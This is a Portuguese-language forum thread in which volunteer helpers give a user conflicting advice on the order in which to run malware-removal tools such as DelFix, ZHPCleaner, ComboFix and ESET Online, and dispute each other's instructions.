joram Highlander Registrado
5.4K Mensagens 2.5K Curtidas
#29 Por joram
09/03/2017 - 21:13
/_ Tmfeijo _\

Agora enrolou,pois indicou a DelFix em momento errado e tenta consertar o engano,pedindo novamente o scan da ZHPCleaner.
Neste caso,teria que ser novamente baixada,pois seria afetada pela DelFix,com a caixa Remover ferramentas de desinfecção,marcada.
A intenção é clara,já que pretendes impedir o script da FRST,pedindo a execução da DelFix antes da fixlist.
Mas não contava com a ZHPCleaner,outra ferramenta que seria afetada,pedida pelo Komm,mas que foi executada em Modo Diagnóstico.

Isto,realmente,confunde os Membros que querem solução para suas máquinas e deparam-se com estas instruções automáticas e sem nenhum diagnóstico. Mas o pedido da DelFix,naquele momento,foi ato desaprovável e covarde.

[A+]
TmfeijoMMonroe
TmfeijoMMonr... Cyber Highlander Registrado
13.7K Mensagens 4.2K Curtidas
#30 Por TmfeijoMMonr...
10/03/2017 - 13:46
Boa tarde ! Prezada regente autora

Em resumo e / ou por enquanto os feitos necessários seria:

Primeiro:
Rode um novo scan com a ZHPCleaner; embora não confio muito na mesma também. Por isto que este técnico-analista não a indicou/indica.
Não esqueça de primar o botão com o nome correto; ou seja em reparar .

Segundo:

Rode a DEL FIX; marcando apenas desinstalar ferramentas de desinfecção .

https://toolslib.net/downloads/viewdownload/2-delfix/

Simplesmente é isto. Após darei mais instruções viáveis .

Abraços

Clareol disse:
Prezados Técnicos
Estou executando o eset online, porém ontem ficou 11 horas passando e achei que estava travado, pois ficar na parte MEMÓRIA OPERACIONAL e não saía, aí eu fechei (não houve log e haviam 7 ameaças) e comecei outra vez hoje, já está com 5h de escaneamento já na parte MEMÓRIA OPERACIONAL e achou apenas 1 ameaça.
Deixo executar até parar(se é que vai parar)... o que eu faço????


Clareol disse:
Vixi Maria
Vocês me confundiram toda... por favor, me esclareçam o que tenho que fazer!!!!


TmfeijoMMonroe disse:
Boa noite ! Prezada regente plena; autora

Vamos com calma . A principio:
Execute agora novamente o combofix, o malwarebytes ( novamente cfe. acima pois será um scan deep ) e a eset on line cfe. acima .
Já podemos tbm rodar a DEL FIX para ir já removendo estas 3 ferramentas já executadas. Que são a JRT, o adwcleaner e até então tbm a ZHPCleaner cfe. abaixo.
Depois usaremos a mesma ( a DEL ) novamente .
Mas apenas marque desinstalar ferramentas de desinfecção .

https://toolslib.net/downloads/viewdownload/2-delfix/


Ps: Um detalhe importante . Não assinale redefinir configurações do sistema; pois voltará ao sistema operacional ainda parcialmente infectado cfe. as ferramentas acima o desinfectou; inclusive haverá contestações negligentes aqui ao contrário/no que tange disto/isto .

Mas antes tbm rode novamente a ZHPCleaner e prime o botão reparar da mesma . Só que antes faça um novo scan .


Editando/editado cfe. acima:

Já no que tange a ZHPCleaner; queira por fineza primar o botão reparar ( função com nome correto no software ); antes dos necessários feitos acima .
Pois anteriormente não fora devidamente orientada . Não é mesmo ?



Abraços
© 1999-2024 Hardware.com.br. Todos os direitos reservados.
Imagem do Modal